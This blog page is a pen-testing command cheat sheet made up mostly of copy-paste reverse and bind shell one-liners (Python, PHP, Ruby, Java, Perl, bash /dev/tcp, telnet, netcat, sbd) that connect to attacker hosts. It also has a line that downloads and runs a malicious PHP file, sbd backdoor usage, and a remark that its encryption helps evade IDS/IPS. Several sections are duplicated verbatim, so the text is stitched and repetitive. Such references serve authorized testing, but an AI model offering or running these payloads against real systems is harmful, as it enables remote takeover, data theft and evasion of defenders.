Linux Command Reference for Pen-testers
This part of the blog is dedicated to Linux and Unix-like commands that can be used from Penetration Testers (yea who is your tester?) and Information Security Administrators. In this page I will periodically post Linux tiny simple scripts and commands that a Penetration tester or a Security Administrator can use to:
1. Perform Administration Security tasks (e.g use windows/linux netcat to bind shells e.t.c).
2. Run Vulnerability Scans (e.g Identify null sessions, test for LANMAN services e.t.c).
3. Do pivoting (e.g after compromising a machine use windows tools to escalate e.t.c).
Using Netcat to Bind Shell
Launching a listening shell in windows and binding from linux:
Launching a listening shell in windows and binding from linux:
nc.exe -L -p <listening port> -e cmd.exe - Running in windows box
nc <windows box ip> <windows port> - Run in Linux/Unix-like box
Launching a listening shell in Linux/Unix-like and binding from Windows:
nc -l -p <listening port> -e /bin/sh - Running in Linux/Unix-like box
nc.exe <linux box ip> <linux port> - Run in Windows box
This can be used to transfer types of files from Linux to windows:
nc.exe -lvvp 4444 > output.txt - Running in the Linux/Unix-like box
cat input.txt | nc.exe -vv 192.168.8.74 4444 - Run in Windows box
This can be used to transfer all type of files from windows to Linux:
nc.exe -lvvp 4444 > output.exe - Running in the Linux box
type input.exe | nc -vv <windows box ip> 4444 - Run in Windows box
Note: You might want to run a file command to identify the type of the file you want to transfer. There is no difference between transferring binary and text files (most of the time).
Using Netcat for port scanning
nc -v -n -z -w 1 192.168.1.2 1-1000 - Run from Linux/Unix-like box
nc.exe -v -n -z -w 1 192.168.1.2 1-1000 - Run from Linux/Unix-like box
Note: The "-n" parameter here prevents DNS lookup, "-z" makes nc not receive any data from the server, and "-w 1" makes the connection timeout after 1 second of inactivity. The commands above will scan from port 1 to 1000.
Using Python to get shell
This was tested under Linux / Python 2.7:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Using PHP to get shell
This code assumes that the TCP connection uses file descriptor 3. This worked on my test system. If it doesn’t work, try 4, 5, 6…
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Using Ruby to get shell
This shell binds a shell in port 1234 (good for installed ruby in the victim machine):
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Using Java to get shell
The following command opens a listening shell in 10.0.0.1:
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
Using Perl to get shell
And a shorter Perl reverse shell that does not depend on /bin/sh:
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
If the target system is running Windows use the following one-liner:
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Alternatives to Bash Shell
Here are some tricks taken from Dameles blog to play with.
exec /bin/bash 0&0 2>&0
Or:
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
Or:
exec 5<>/dev/tcp/attackerip/4444
cat <&5 | while read line; do $line 2>&5 >&5; done # or:
while read line 0<&5; do $line 2>&5 >&5; done
Using Telnet to get shell
Of course, you can also use Telnet as an alternative for Netcat:
rm -f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0/tmp/p
Or:
telnet attackerip 4444 | /bin/bash | telnet attackerip 4445
Note: Remember to listen on your machine also on port 4445/tcp
Using sbd to get shell
An article on http://www.secureit.co.il discussed the availability of sbd (Shadowinteger's Backdoor), available at http://cycom.se/dl/sbd. It is described as a ‘Netcat- clone, designed to be portable and offer strong encryption’. It supports aes-128 encryption and is available on most platforms, including win32 and Linux.
Command with no encryption for listening in Windows: sbd.exe –l –p 5555 –c off
Command with encryption for listening in Windows: sbd.exe –l –p 5555 –c on
Binding a shell to Windows machine with encryption: sbd.exe –l –p 5555 –c on –e cmd.exe
Binding a shell to Windows machine with encryption: sbd.exe –l –p 5555 –c off –e cmd.exe
Command with no encryption for connecting to Windows from Linux: sbd 192.168.11.21 5555 –c off
Command with encryption for connecting to Windows with Linux: sbd 192.168.1.21 5555 –c on
This command will monitor traffic at the server side: sbd -m on -r 0 -l -p 100 -e cmd.exe
This command will cause a port forwarding: sbd 127.0.0.1 2000 | cmd.exe | sbd 127.0.0.1 3000
This command will do perform a connection forwarding: sbd -vv -l -p 90 | sbd -c off www.radarhack.com 80
Note: The example of the reverse shell should prove that a decent configuration of firewalls in the outbound direction is necessary. In the scenario that a Trojan can be installed on a webserver, it is very important to prevent that this server can connect back out of the network, resulting in a shell for the attacker.
Using sbd to transfer file
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
Using Perl to get shell
And a shorter Perl reverse shell that does not depend on /bin/sh:
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
If the target system is running Windows use the following one-liner:
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Alternatives to Bash Shell
Here are some tricks taken from Dameles blog to play with.
exec /bin/bash 0&0 2>&0
Or:
0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196
Or:
exec 5<>/dev/tcp/attackerip/4444
cat <&5 | while read line; do $line 2>&5 >&5; done # or:
while read line 0<&5; do $line 2>&5 >&5; done
Using Telnet to get shell
Of course, you can also use Telnet as an alternative for Netcat:
rm -f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0/tmp/p
Or:
telnet attackerip 4444 | /bin/bash | telnet attackerip 4445
Note: Remember to listen on your machine also on port 4445/tcp
Using sbd to get shell
An article on http://www.secureit.co.il discussed the availability of sbd (Shadowinteger's Backdoor), available at http://cycom.se/dl/sbd. It is described as a ‘Netcat- clone, designed to be portable and offer strong encryption’. It supports aes-128 encryption and is available on most platforms, including win32 and Linux.
Command with no encryption for listening in Windows: sbd.exe –l –p 5555 –c off
Command with encryption for listening in Windows: sbd.exe –l –p 5555 –c on
Binding a shell to Windows machine with encryption: sbd.exe –l –p 5555 –c on –e cmd.exe
Binding a shell to Windows machine with encryption: sbd.exe –l –p 5555 –c off –e cmd.exe
Command with no encryption for connecting to Windows from Linux: sbd 192.168.11.21 5555 –c off
Command with encryption for connecting to Windows with Linux: sbd 192.168.1.21 5555 –c on
This command will monitor traffic at the server side: sbd -m on -r 0 -l -p 100 -e cmd.exe
This command will cause a port forwarding: sbd 127.0.0.1 2000 | cmd.exe | sbd 127.0.0.1 3000
This command will do perform a connection forwarding: sbd -vv -l -p 90 | sbd -c off www.radarhack.com 80
Note: The example of the reverse shell should prove that a decent configuration of firewalls in the outbound direction is necessary. In the scenario that a Trojan can be installed on a webserver, it is very important to prevent that this server can connect back out of the network, resulting in a shell for the attacker.
Using sbd to transfer file
For file receiving in Windows the command is: sbd.exe –l –p 5555 > output.txt
For file sending in Linux the command is: cat input.txt | sbd 192.168.11.21 5555
Note: There is not difference in transferring an executable or simply a text file.
Using sbd to respawn the shell
Another interesting feature of sbd if the -r option that allows you to respawn the shell. From the moment the client disconnects, the server side will exit. In order to respawn the server, specify the -r seconds’ switch. The server will be listening a gain after the specified amount of time. This might prevent the backdoor from existing and prevent to reconnect. Specifying a time of 0 seconds, will respawn the server immediately.
Here is a typical interaction with sbd respawning the shell after the connection is droped:
sbd -r 8 f -P server -l -p 100
demolisher: test1
demolisher: test2
sbd -P demolisher 127.0.0.1 100
test1
^C
sbd -P demolisher 127.0.0.1 100
connect(): WSAECONNREFUSED
sbd -P demolisher 127.0.0.1 100
connect(): WSAECONNREFUSED
... after 8 seconds ....
sbd -P demolisher 127.0.0.1 100
test2
After evaluating (or playing in other words), the tool seems very useful and easy to use. It contains (much) less features than netcat, although it offers build-in encryption, which can be useful to avoid IDS/IPS systems, although some will detect malicious behavior, if used on well-known ports.
Useful commands for copy paste
sbd -r 8 f -P server -l -p 100
demolisher: test1
demolisher: test2
sbd -P demolisher 127.0.0.1 100
test1
^C
sbd -P demolisher 127.0.0.1 100
connect(): WSAECONNREFUSED
sbd -P demolisher 127.0.0.1 100
connect(): WSAECONNREFUSED
... after 8 seconds ....
sbd -P demolisher 127.0.0.1 100
test2
After evaluating (or playing in other words), the tool seems very useful and easy to use. It contains (much) less features than netcat, although it offers build-in encryption, which can be useful to avoid IDS/IPS systems, although some will detect malicious behavior, if used on well-known ports.
Useful commands for copy paste
nc <attacker_ip> <port> -e /bin/bash
mknod backpipe p; nc <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe
/bin/bash -i > /dev/tcp/<attacker_ip>/<port> 0<&1 2>&1
mknod backpipe p; telnet <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe
telnet <attacker_ip> <1st_port> | /bin/bash | telnet <attacker_ip> <2nd_port>
wget -O /tmp/bd.php <url_to_malicious_file> && php -f /tmp/bd.php
References:
http://pentestmonkey.net
http://wikipedia.org
blog
No comments:
Post a Comment